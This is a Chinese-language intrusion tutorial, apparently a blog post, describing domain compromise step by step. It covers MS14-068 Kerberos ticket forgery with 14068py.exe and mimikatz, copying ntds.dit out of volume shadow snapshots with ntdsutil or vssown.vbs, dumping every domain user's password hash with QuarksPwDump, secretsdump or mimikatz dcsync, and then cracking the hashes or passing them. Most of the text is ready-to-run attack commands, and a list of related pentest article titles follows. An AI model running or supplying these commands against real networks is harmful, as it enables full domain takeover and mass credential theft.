内网渗透之——域渗透中利用ms-14-068漏洞进行票据伪装获取域管账号密码
利用过程
1.利用该漏洞伪装票据
2.导出域hash值
3.破解利用hash值
一、利用漏洞伪装票据
条件
知道域名,sid,并拥有一个域普通用户的账号密码和知道域控的名称
步骤
1.拿到一台普通域用户机器,获取sid
whoami /all
2.域名,域控名获取
域名获取:
ipconfig /all
查询域控:
net time /domain
3.上传14068py.exe,命令行输入命令进行票据伪装,会在当前目录下生成一个TGT文件
14068py.exe -u 域用户全称 -p "密码" -s sid -d 域控名全称
用户全名为:用户名@域名
4.输入klist purge可删除所有票据
5.上传mimikatz.exe,输入命令使用刚才伪装的票据
mimikatz.exe "kerberos::ptc xxxxx" exit
xxxxx处替换刚才生成的TGT文件名
6.输入klist查看票据,替换成功
7.无需输入密码即可查看域控的c盘目录,说明域管身份的票据伪装成功
dir \\域控全称\c$
二、导出域hash值
·获取ntds.dit并分析获得hash
思路
1.票据伪装成功后远程连接,利用计划任务或远程执行控制DC执行命令(此处实验直接在dc进行,利用计划任务或远程执行控制DC执行命令点击此处跳转到详细使用方法)
2.利用工具获取、分析得到域hash值
1.获取ntds.dit
1.1 利用ntdsutil(win8之后自带)导出ntds.dit
1.1.1 交互式shell:
输入ntdsutil进入交互式界面
输入snapshot进入快照功能
将活动实例设置为ntds
activate instance ntds
输入create创建快照
将快照挂载到c盘,此时c盘就出现了一个和c盘内容一样的快照,并且没有被占用
mount 快照名
退出ntdsutil,复制快照下的ntds.dit到指定路径(离线分析还需要复制快照里的Windows\System32\config\SYSTEM,在线分析省略)
copy C:\$SNAP_202003310959_VOLUMEC$\Windows\NTDS\ntds.dit c:\
再次进入ntdsutil的快照功能,删除快照
ntdsutil
snapshot
unmount 快照名
1.1.2 非交互式shell:
输入以下命令直接一次性创建快照并退出
ntdsutil snapshot "activate instance ntds" create quit quit
输入以下命令挂载刚刚生成的快照
ntdsutil snapshot "mount 快照名" quit quit
复制快照下的ntds.dit到指定路径(离线分析还需要复制快照里的Windows\System32\config\SYSTEM,在线分析省略)
copy C:\$SNAP_202003311014_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds1.dit
删除快照
ntdsutil snapshot "unmount 快照名" quit quit
1.2 vssown.vbs提取ntds.dit
上传脚本并开始运行脚本
cscript vssown.vbs /start
查看运行状态
cscript vssown.vbs /status
创建c盘的快照
cscript vssown.vbs /create C
查看快照信息
cscript vssown.vbs /list
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 即为c盘快照的根目录路
将快照里的ntds.dit复制到当前目录
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ntds.dit
将快照里的SYSTEM复制到当前目录(离线分析需要,在线分析省略)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM
删除创建的快照
cscript vssown.vbs /delete *
停止脚本运行
cscript vssown.vbs /stop
2.分析ntds.dit
2.1 利用QuarkPwDump在线分析
上传QuarkPwDump.exe到目标机c:/
输入命令获取ntds.dit里的域用户密码
QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit路径
2.2 利用kali里的impacket-secretsdump离线分析
复制生成的ntds.dit和SYSTEM到kali
终端输入命令破解ntds.dit
impacket-secretsdump -ntds ntds.dit -system SYSTEM local
·mimikatz提取hash
条件
获取普通域成员机的shell即可
步骤
在上述14068伪装票据的基础上远程连接dc
输入mimikatz.exe进入软件
提取指定域用户的hash值
lsadump::dcsync /domain:域名 /user:用户名 /csv
三、破解密码
利用破解工具,cmd5进行破解,破解不成功可尝试hash注入
点击此处查看hash注入具体使用方法
内网渗透之——域渗透中利用ms-14-068漏洞进行票据伪装获取域管账号密码相关推荐
- 《内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御
目录 前言 一.跨域攻击方法 二.利用域信任关系的跨域攻击 1.域信任简介 2.获取域信息 3.利用域信任秘钥(NTLM Hash)获取目标域的权限 4.利用krbtgt散列值获取目标域的权限 5.利 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(六):域控制器安全
目录 前言 一.使用卷影拷贝服务提取ntds.dit 1.ntdsutil.exe 2.vssadmin 3.vssown.vbs 4.ntdsutil的IFM 5.diskshadow 6.防范 二 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(五):域内横向移动分析及防御
目录 前言 一.常用Windows远程连接和命令 1.IPC (1)利用条件 (2)连接失败的原因 2.Windows自带工具 (1)dir (2)tasklist 3.计划任务 (1)at (2)s ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(八):权限维持分析及防御
目录 前言 一.操作系统后门 1.粘滞键后门 2.注册表注入后门 3.计划任务后门 4.meterpreter后门 5.Cymothoa后门 6.WMI后门 二.WEB后门 1.Nishang下的We ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(二):内网信息收集
目录 前言 一.收集本机信息 1.手动搜集 (1)查询网络配置 (2)查询操作系统及软件的信息 (3)查询本机服务信息 (4)查询进程列表 (5)查看启动程序信息 (6)查看计划任务 (7)查看主机开 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(四):权限提升分析及防御
目录 前言 一.系统内核溢出漏洞提权分析及防范 1.通过手动执行命令发现缺失补丁 (1)MS16-032(KB3139914) 2.利用MSF发现缺失补丁 3.Windows Exploit Sugg ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...
- 内网安全攻防:渗透测试实战指南之内网信息搜集
<内网安全攻防:渗透测试实战指南>第2章:内网信息搜集 内网渗透测试的核心是信息搜集.本章主要介绍了当前主机信息搜集.域内存活主机探测.域内端口扫描.域内用户和管理员权限的获取.如何获取域 ...
- Frp 内网穿透服务器在渗透中的应用
内容 实战-在内网发布服务使之可在公网访问 使用 frp 搭建内网穿透服务器 实战-kali 配置 MSF 接收来自公网的 shell 实战-跨网段获取内网 shell 实战-内网穿透-二级代理 实战 ...
- 内网安全(四)---横向渗透:PTHPTKPTT
域横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值. PTT(pass the ticket): 利用的 ...
最新文章
- 随便创作的文件加密算法不知谁人能破解
- modelsim(1):经常使用的测试设计的结构
- ARM的编程模式和7种模式
- Module build failed (from ./node_modules/babel-loader/lib/index.js): Error: [BABEL] D:\moblie\web_co
- SQL Server常用约束表达式实例
- spring AOP注解实现
- [二分搜索|快速选择] leetcode 4 寻找两个正序数组的中位数
- python 基础语法梳理
- 课程设计哈夫曼编/译码系统
- java 使用response方式下载txt文件
- 计算机技术与高中英语教学整合,计算机技术与高中英语课程整合的探讨(多媒体英语教学系列论文十篇).doc...
- 公布网贷者“黑名单” 涉嫌侵犯个人隐私
- Android M及以上版本系统 悬浮窗权限 的解决方案
- 阿里“中供系”前世今生:马云麾下最神秘的子弟兵
- 清除异常关闭进程的任务栏托盘区残留图标
- 物料编码的方法与技术
- 一个毕业6年的程序员工作经历和成长感悟(中)
- 读《Analyzing Unaligned Multimodal Sequence via Graph Convolution and Graph Pooling Fusion》
- 域名访问和ip访问区别
- 【CISSP备考笔记】第6章:安全评估与测试